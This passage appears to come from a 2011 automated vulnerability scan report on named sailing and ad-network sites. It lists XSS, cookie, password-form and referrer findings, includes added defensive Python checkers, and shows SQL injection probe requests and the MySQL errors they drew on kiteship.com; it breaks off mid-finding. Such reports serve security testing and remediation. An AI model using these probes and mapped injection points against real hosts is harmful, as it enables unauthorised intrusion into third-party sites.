3.33. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 3]

3.34. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 3]

3.35. http://www.sailinganarchy.com/article_submission.php [name of an arbitrarily supplied request parameter]

3.36. http://www.stumbleupon.com/submit [url parameter]

3.37. http://www.tuenti.com/share [name of an arbitrarily supplied request parameter]

3.38. http://www.tuenti.com/share [name of an arbitrarily supplied request parameter]

3.39. http://www.tuenti.com/share [url parameter]

3.40. http://www.yachtscoring.com/event_results_cumulative.cfm [eID parameter]

3.41. http://k.collective-media.net/cmadj/cm.martini/ [cli cookie]
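
A reflected XSS finding rests on two observations: that a probe comes back in the response body, and in what context and encoding it lands. The added example below is not from the report or from any listed site; it classifies a reflection as unencoded, HTML-encoded or absent, and covers the "callback parameter" shape of 3.10, where the parameter becomes the start of a JSONP script body and HTML encoding is the wrong fix. The probe string, the endpoint stand-ins and the sample bodies are constructed.

```python
import html
import re

# Added example. The probe string, the endpoint stand-ins and the sample
# bodies are constructed, not taken from the report.

# A probe that is harmless if escaped and breaks out of an attribute and a
# tag if it is not. The unusual token makes it easy to locate in a response.
PROBE = 'cs20110120"><u>x</u>'

def reflection_kind(probe, body):
    """Classify how a probe came back in a response body."""
    if probe in body:
        return "unencoded"      # reflected as-is: an exploitable context is likely
    if html.escape(probe, quote=True) in body:
        return "html-encoded"   # reflected, but neutralised for HTML text and attributes
    return "absent"

def search_page_vulnerable(query):
    # Query written into markup without encoding.
    return f"<p>Results for {query}</p>"

def search_page_hardened(query):
    # Contextual output encoding for an HTML text node.
    return f"<p>Results for {html.escape(query, quote=True)}</p>"

def jsonp_vulnerable(callback, payload_json):
    # The callback name becomes the first bytes of a script body.
    return f"{callback}({payload_json});"

_CALLBACK = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$.]{0,63}$")

def jsonp_hardened(callback, payload_json):
    """Allow only identifier-like callback names and reject the rest: there is
    no output encoding that makes an arbitrary string a safe JS identifier."""
    if not _CALLBACK.match(callback):
        raise ValueError("invalid callback name")
    # A leading comment stops the response from starting with caller-chosen bytes.
    return f"/**/{callback}({payload_json});"

if __name__ == "__main__":
    print(reflection_kind(PROBE, search_page_vulnerable(PROBE)))
    print(reflection_kind(PROBE, search_page_hardened(PROBE)))
    print(reflection_kind(PROBE, jsonp_vulnerable(PROBE, "{}")))
    print(jsonp_hardened("jQuery17_cb", '{"ok":true}'))
```

An "html-encoded" result means the reflection is safe in body text and in quoted attributes; inside a script block, an event handler attribute or a URL the required encoding differs, so inspect the surrounding markup rather than stopping at the classification. For JSONP endpoints also check the Content-Type: a reflected callback served as text/html is plain XSS regardless of the callback filter.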

4. Cleartext submission of password

4.1. http://americascup.mediaaccess.evolix.net/index.php

4.2. http://digg.com/submit

4.3. http://translate.googleusercontent.com/translate_c

4.4. http://www.americascupmedia.com/index.php

4.5. http://www.regattaregatta.com/

4.6. http://www.usaca.info/

4.7. http://www.w-w-i.com/velux_5_oceans_2010_race/

5. Session token in URL

6. Password field submitted using GET method

6.1. http://americascup.mediaaccess.evolix.net/index.php

6.2. http://digg.com/submit

6.3. http://www.americascupmedia.com/index.php

7. Cookie scoped to parent domain

7.1. http://www.stumbleupon.com/submit

7.2. http://2822.v.fwmrm.net/ad/g/1

7.3. http://2822.v.fwmrm.net/ad/l/1

7.4. http://2822.v.fwmrm.net/ad/p/1

7.5. http://ad.afy11.net/ad

7.6. http://ad.doubleclick.net/click

7.7. http://ad.doubleclick.net/clk

7.8. http://brxserv.btrll.com/favicon.ico

7.9. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/

7.10. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.click/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2Nsay8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL25vbmUvO1ZpZGVvOzEyOTU0ODI0NDI]]

7.11. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.end/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL2RvbmU7VmlkZW87MTI5NTQ4MjQ0Mg

7.12. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.end/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL2RvbmU7VmlkZW87MTI5NTQ4MjQ0Mg]]

7.13. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.imp/r_64.aHR0cDovL2Iuc2NvcmVjYXJkcmVzZWFyY2guY29tL3A_YzE9MSZjMj02MDAwMDA2JmMzPSZjND0mYzU9MDEwMDAwJmM2PTI5MDMmYzEwPSZjQTE9OCZjQTI9NjAwMDAwNiZjQTM9Mzg0NDU1NSZjQTQ9MTkzOCZjQTU9MzkzJmNBNj0yOTAzJmNBMTA9MjI4NiZjdj0xLjcmY2o9JnJuPTEyOTU0ODI0NDImcj1odHRwJTNBJTJGJTJGcGl4ZWwucXVhbnRzZXJ2ZS5jb20lMkZwaXhlbCUyRnAtY2I2QzB6RkY3ZFdqSS5naWYlM0ZsYWJlbHMlM0RwLjI5MDMuMzg0NDU1NS4wJTJDYS4zOTMuMTkzOC4yMjg2JTJDdS5wcmUuMHgwJTNCbWVkaWElM0RhZCUzQnIlM0QxMjk1NDgyNDQy

7.14. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.imp/r_64.aHR0cDovL2Iuc2NvcmVjYXJkcmVzZWFyY2guY29tL3A_YzE9MSZjMj02MDAwMDA2JmMzPSZjND0mYzU9MDEwMDAwJmM2PTI5MDMmYzEwPSZjQTE9OCZjQTI9NjAwMDAwNiZjQTM9Mzg0NDU1NSZjQTQ9MTkzOCZjQTU9MzkzJmNBNj0yOTAzJmNBMTA9MjI4NiZjdj0xLjcmY2o9JnJuPTEyOTU0ODI0NDImcj1odHRwJTNBJTJGJTJGcGl4ZWwucXVhbnRzZXJ2ZS5jb20lMkZwaXhlbCUyRnAtY2I2QzB6RkY3ZFdqSS5naWYlM0ZsYWJlbHMlM0RwLjI5MDMuMzg0NDU1NS4wJTJDYS4zOTMuMTkzOC4yMjg2JTJDdS5wcmUuMHgwJTNCbWVkaWElM0RhZCUzQnIlM0QxMjk1NDgyNDQy]]

7.15. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.mid/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL21pZDtWaWRlbzsxMjk1NDgyNDQy

7.16. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.mid/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL21pZDtWaWRlbzsxMjk1NDgyNDQy]]

7.17. http://ib.adnxs.com/mapuid

7.18. http://ib.adnxs.com/ptj

7.19. http://ib.adnxs.com/ptj

7.20. http://ib.adnxs.com/ptj

7.21. http://ib.adnxs.com/ptj

7.22. http://ib.adnxs.com/ptj

7.23. http://ib.adnxs.com/ptj

7.24. http://ib.adnxs.com/ptj

7.25. http://ib.adnxs.com/ptj

7.26. http://ib.adnxs.com/seg

7.27. http://www.tuenti.com/

7.28. http://www.tuenti.com/

7.29. http://www.tuenti.com/share

8. Cookie without HttpOnly flag set

8.1. http://americascup.mediaaccess.evolix.net/index.php

8.2. http://www.americascupmedia.com/index.php

8.3. http://www.beneteaucountdown.com/

8.4. http://www.w-w-i.com/velux_5_oceans_2010_race/

8.5. http://www.yachtscoring.com/event_results_cumulative.cfm

8.6. http://2822.v.fwmrm.net/ad/g/1

8.7. http://2822.v.fwmrm.net/ad/l/1

8.8. http://2822.v.fwmrm.net/ad/p/1

8.9. http://ad.afy11.net/ad

8.10. http://ad.doubleclick.net/click

8.11. http://ad.doubleclick.net/clk

8.12. http://brxserv.btrll.com/favicon.ico

8.13. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/

8.14. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.click/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2Nsay8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL25vbmUvO1ZpZGVvOzEyOTU0ODI0NDI]]

8.15. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.end/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL2RvbmU7VmlkZW87MTI5NTQ4MjQ0Mg

8.16. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.end/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL2RvbmU7VmlkZW87MTI5NTQ4MjQ0Mg]]

8.17. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.imp/r_64.aHR0cDovL2Iuc2NvcmVjYXJkcmVzZWFyY2guY29tL3A_YzE9MSZjMj02MDAwMDA2JmMzPSZjND0mYzU9MDEwMDAwJmM2PTI5MDMmYzEwPSZjQTE9OCZjQTI9NjAwMDAwNiZjQTM9Mzg0NDU1NSZjQTQ9MTkzOCZjQTU9MzkzJmNBNj0yOTAzJmNBMTA9MjI4NiZjdj0xLjcmY2o9JnJuPTEyOTU0ODI0NDImcj1odHRwJTNBJTJGJTJGcGl4ZWwucXVhbnRzZXJ2ZS5jb20lMkZwaXhlbCUyRnAtY2I2QzB6RkY3ZFdqSS5naWYlM0ZsYWJlbHMlM0RwLjI5MDMuMzg0NDU1NS4wJTJDYS4zOTMuMTkzOC4yMjg2JTJDdS5wcmUuMHgwJTNCbWVkaWElM0RhZCUzQnIlM0QxMjk1NDgyNDQy

8.18. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.imp/r_64.aHR0cDovL2Iuc2NvcmVjYXJkcmVzZWFyY2guY29tL3A_YzE9MSZjMj02MDAwMDA2JmMzPSZjND0mYzU9MDEwMDAwJmM2PTI5MDMmYzEwPSZjQTE9OCZjQTI9NjAwMDAwNiZjQTM9Mzg0NDU1NSZjQTQ9MTkzOCZjQTU9MzkzJmNBNj0yOTAzJmNBMTA9MjI4NiZjdj0xLjcmY2o9JnJuPTEyOTU0ODI0NDImcj1odHRwJTNBJTJGJTJGcGl4ZWwucXVhbnRzZXJ2ZS5jb20lMkZwaXhlbCUyRnAtY2I2QzB6RkY3ZFdqSS5naWYlM0ZsYWJlbHMlM0RwLjI5MDMuMzg0NDU1NS4wJTJDYS4zOTMuMTkzOC4yMjg2JTJDdS5wcmUuMHgwJTNCbWVkaWElM0RhZCUzQnIlM0QxMjk1NDgyNDQy]]

8.19. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.mid/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL21pZDtWaWRlbzsxMjk1NDgyNDQy

8.20. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.mid/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL21pZDtWaWRlbzsxMjk1NDgyNDQy]]

8.21. http://digg.com/submit

8.22. http://translate.googleusercontent.com/translate_c

8.23. http://www.barcelonaworldrace.org/

8.24. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072

8.25. http://www.regattaregatta.com/

8.26. http://www.stumbleupon.com/submit

8.27. http://www.tuenti.com/

8.28. http://www.tuenti.com/

8.29. http://www.tuenti.com/share

8.30. http://www.usaca.info/
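
Sections 7 and 8 are both read off Set-Cookie headers: a Domain attribute naming a parent of the issuing host shares the cookie with every sibling host under that parent, and a missing HttpOnly attribute leaves the cookie readable to script, which turns any reflected XSS on the same origin into session theft. The added example below parses constructed Set-Cookie values (not the headers of any listed host) and produces both findings, plus the missing Secure attribute, a category the report does not list.

```python
# Added example. The issuing host and the Set-Cookie values are constructed
# and are not the headers of any host in the report.

def parse_set_cookie(header_value):
    """Split one Set-Cookie value into name, value and lowercase attributes."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs

def scoped_to_parent_domain(issuing_host, domain_attr):
    """True when Domain names a proper parent of the issuing host, e.g.
    Domain=.example.test set by www.example.test. Label comparison only:
    browsers additionally refuse public suffixes such as .co.uk, which a
    real check should look up in the Public Suffix List."""
    host = issuing_host.lower()
    domain = domain_attr.lower().lstrip(".")
    return domain != host and host.endswith("." + domain)

def cookie_findings(issuing_host, set_cookie_values):
    """Return (cookie name, issue) pairs in the report's wording."""
    findings = []
    for raw in set_cookie_values:
        name, _, attrs = parse_set_cookie(raw)
        if "httponly" not in attrs:
            findings.append((name, "cookie without HttpOnly flag set"))
        if "domain" in attrs and scoped_to_parent_domain(issuing_host, attrs["domain"]):
            findings.append((name, "cookie scoped to parent domain"))
        if "secure" not in attrs:
            # Not a category in the report above; included because it is
            # read from the same attribute list.
            findings.append((name, "cookie without Secure flag set"))
    return findings

SAMPLE_HOST = "www.example.test"
SAMPLE_SET_COOKIES = [
    "sid=7f3a9c; Path=/; Domain=.example.test",
    "prefs=dark; Path=/; HttpOnly",
    "csrf=e1d2; Path=/; Domain=www.example.test; HttpOnly; Secure",
]

if __name__ == "__main__":
    for name, issue in cookie_findings(SAMPLE_HOST, SAMPLE_SET_COOKIES):
        print(f"{name}: {issue}")
```

For the third-party ad hosts in section 7 a parent-scoped cookie is usually how the service is meant to work; the finding matters most on first-party sites where subdomains run with different trust levels, because a compromise of any sibling host then yields the cookie. HttpOnly is worth fixing everywhere a cookie carries a session, since it removes the cheapest payload for the XSS findings in section 3.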

9. Password field with autocomplete enabled

9.1. http://americascup.mediaaccess.evolix.net/index.php

9.2. http://americascup.mediaaccess.evolix.net/index.php

9.3. http://digg.com/submit

9.4. http://digg.com/submit

9.5. http://translate.googleusercontent.com/translate_c

9.6. http://www.americascupmedia.com/index.php

9.7. http://www.americascupmedia.com/index.php

9.8. http://www.regattaregatta.com/

9.9. http://www.tuenti.com/

9.10. http://www.tuenti.com/share

9.11. http://www.usaca.info/

9.12. http://www.w-w-i.com/velux_5_oceans_2010_race/
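
Sections 4, 6 and 9 are properties of the same login form and are best checked together: an action over http sends the password in cleartext, a GET form puts it in the URL (and so into browser history, the Referer of the next request and server logs), and a password field without autocomplete=off is offered for storage by the browser. The added example below is not from the report or from any listed site; it extracts password-bearing forms from constructed markup and reports the three conditions. The page URL and the HTML are assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Added example. The page URL and the HTML are constructed for illustration
# and are not the markup of any site in the report.

class _FormCollector(HTMLParser):
    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.forms = []
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self._form = {
                # Resolve relative actions against the page: a relative action
                # on an http page submits over http.
                "action": urljoin(self.page_url, a.get("action", "")),
                "method": a.get("method", "get").lower() or "get",
                "autocomplete": a.get("autocomplete", "on").lower(),
                "password_fields": [],
            }
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            if a.get("type", "text").lower() == "password":
                self._form["password_fields"].append(
                    {"name": a.get("name", ""), "autocomplete": a.get("autocomplete", "").lower()})

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None

def password_form_findings(page_url, markup):
    """Return (resolved form action, issue) pairs for every form with a password field."""
    collector = _FormCollector(page_url)
    collector.feed(markup)
    collector.close()
    findings = []
    for form in collector.forms:
        if not form["password_fields"]:
            continue
        action = form["action"]
        if urlsplit(action).scheme != "https":
            findings.append((action, "cleartext submission of password"))
        if form["method"] == "get":
            findings.append((action, "password field submitted using GET method"))
        for field in form["password_fields"]:
            if field["autocomplete"] != "off" and form["autocomplete"] != "off":
                findings.append((action, "password field with autocomplete enabled"))
    return findings

SAMPLE_URL = "http://www.example.test/index.php"
SAMPLE_HTML = """
<form action="index.php" method="get">
  <input type="text" name="user">
  <input type="password" name="pass">
</form>
<form action="https://login.example.test/session" method="post" autocomplete="off">
  <input type="text" name="user">
  <input type="password" name="pass">
</form>
<form action="/search"><input type="text" name="q"></form>
"""

if __name__ == "__main__":
    for action, issue in password_form_findings(SAMPLE_URL, SAMPLE_HTML):
        print(f"{issue}: {action}")
```

An https action on an http page still fails in practice, because the page carrying the form can be altered in transit before the browser ever posts; the cleartext finding is only closed when the form itself is served over https. Treat the autocomplete finding as informational: current browsers' password managers ignore autocomplete=off on login fields.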

10. Cross-domain POST

10.1. http://translate.googleusercontent.com/translate_c

10.2. http://translate.googleusercontent.com/translate_c

10.3. http://www.sailinganarchy.com/advertise.htm

11. Cross-domain Referer leakage

11.1. http://ad.doubleclick.net/adj/cm.martini/

11.2. http://ad.doubleclick.net/adj/cm.martini/

11.3. http://americascup.mediaaccess.evolix.net/index.php

11.4. http://armchairmango.blip.tv/posts

11.5. http://blip.tv/comments/

11.6. http://blip.tv/file/4639878

11.7. http://blip.tv/file/get/ArmchairMango-DRYSuitBecomesAWETSuit905.mp4

11.8. http://blip.tv/file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks827.mp4

11.9. http://blip.tv/file/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog612.mp4

11.10. http://blip.tv/file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy918.mp4

11.11. http://blip.tv/file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed570.mp4

11.12. http://blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4

11.13. http://blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4

11.14. http://blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v

11.15. http://blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v

11.16. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf399.m4v

11.17. http://blip.tv/file/view/4639878

11.18. http://blip.tv/html5/

11.19. http://blip.tv/players/embed/

11.20. http://blip.tv/posts/

11.21. http://blip.tv/posts/

11.22. http://blip.tv/posts/report_inappropriate

11.23. http://blip.tv/users/blogging_info

11.24. http://blip.tv/users/login/

11.25. http://digg.com/submit

11.26. http://ib.adnxs.com/ptj

11.27. http://ib.adnxs.com/ptj

11.28. http://ib.adnxs.com/ptj

11.29. http://ib.adnxs.com/ptj

11.30. http://translate.googleusercontent.com/translate_c

11.31. http://translate.googleusercontent.com/translate_c

11.32. http://translate.googleusercontent.com/translate_c

11.33. http://www.americascupmedia.com/index.php

11.34. http://www.bymnews.com/news/newsList.php

11.35. http://www.stumbleupon.com/submit

11.36. http://www.tuenti.com/

11.37. http://www.tuenti.com/share

11.38. http://www.yachtscoring.com/event_results_cumulative.cfm

12. Cross-domain script include

12.1. http://americascup.mediaaccess.evolix.net/index.php

12.2. http://armchairmango.blip.tv/

12.3. http://armchairmango.blip.tv/posts

12.4. http://armchairmango.blip.tv/posts

12.5. http://backend.userland.com/creativeCommonsRssModule

12.6. http://blip.tv/file/4639878

12.7. http://digg.com/submit

12.8. http://translate.googleusercontent.com/translate_c

12.9. http://translate.googleusercontent.com/translate_c

12.10. http://www.americascupmedia.com/index.php

12.11. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072

12.12. http://www.sailinganarchy.com/ADs/nauticexpo/nauticexpo.htm

12.13. http://www.sailinganarchy.com/breymaiersailing.com

12.14. http://www.sailinganarchy.com/calendar/index.php

12.15. http://www.sailinganarchy.com/editor/audio_video.php

12.16. http://www.sailinganarchy.com/editor/pimpin.php

12.17. http://www.sailinganarchy.com/index_page1.php

12.18. http://www.sailinganarchy.com/index_page2.php

12.19. http://www.sailinganarchy.com/none

12.20. http://www.stumbleupon.com/submit

13. File upload functionality

14. Email addresses disclosed

14.1. http://americascup.mediaaccess.evolix.net/scripts/jquery.cookie.js

14.2. http://americascup.mediaaccess.evolix.net/scripts/overlib.js

14.3. http://www.americascupmedia.com/scripts/jquery.cookie.js

14.4. http://www.americascupmedia.com/scripts/overlib.js

14.5. http://www.bymnews.com/news/newsList.php

14.6. http://www.bymnews.com/scripts/prototype.js

14.7. http://www.sailinganarchy.com/advertise.htm

14.8. http://www.sailinganarchy.com/breymaiersailing.com

14.9. http://www.sailinganarchy.com/calendar/index.php

14.10. http://www.sailinganarchy.com/editor/audio_video.php

14.11. http://www.sailinganarchy.com/editor/pimpin.php

14.12. http://www.sailinganarchy.com/index_page1.php

14.13. http://www.sailinganarchy.com/index_page2.php

14.14. http://www.sailinganarchy.com/java/ad_rotation.js

14.15. http://www.sailinganarchy.com/none

14.16. http://www.sailinganarchy.com/terms.htm

14.17. http://www.w-w-i.com/velux_5_oceans_2010_race/

14.18. http://www.yachtscoring.com/event_results_cumulative.cfm

15. Private IP addresses disclosed

15.1. http://digg.com/submit

15.2. http://digg.com/submit

16. HTML does not specify charset

16.1. http://2822.v.fwmrm.net/ad/g/1

16.2. http://ad.doubleclick.net/clk

16.3. http://backend.userland.com/creativeCommonsRssModule

16.4. http://backend.userland.com/favicon.ico

16.5. http://ib.adnxs.com/ptj

16.6. http://www.beneteaucountdown.com/favicon.ico

16.7. http://www.bymnews.com/news/newsList.php

16.8. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm

16.9. http://www.sailinganarchy.com/ADs/nauticexpo/nauticexpo.htm

16.10. http://www.sailinganarchy.com/breymaiersailing.com

16.11. http://www.sailinganarchy.com/none

17. Content type incorrectly stated

17.1. http://ad.doubleclick.net/clk

17.2. http://blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v

17.3. http://brxserv.btrll.com/



1. SQL injection
There are 5 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.kiteship.com/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kiteship.com
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET / HTTP/1.1
Host: www.kiteship.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:48:58 GMT
Server: Apache/1.3.42 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Connection: close
Content-Type: text/html
Content-Length: 14060

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>KiteShip - Innovatio
...[SNIP]...
<font color="red">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2011-01-19'' at line 1</font>
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: www.kiteship.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:48:59 GMT
Server: Apache/1.3.42 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Connection: close
Content-Type: text/html
Content-Length: 13478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>KiteShip - Innovatio
...[SNIP]...

1.2. http://www.kiteship.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kiteship.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /?1'=1 HTTP/1.1
Host: www.kiteship.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:48:49 GMT
Server: Apache/1.3.42 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Connection: close
Content-Type: text/html
Content-Length: 14074

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>KiteShip - Innovatio
...[SNIP]...
<font color="red">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND date = '2011-01-19'' at line 1</font>
...[SNIP]...

Request 2

GET /?1''=1 HTTP/1.1
Host: www.kiteship.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:48:49 GMT
Server: Apache/1.3.42 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Connection: close
Content-Type: text/html
Content-Length: 13478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>KiteShip - Innovatio
...[SNIP]...

1.3. http://www.tuenti.com/share [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.tuenti.com
Path:   /share

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

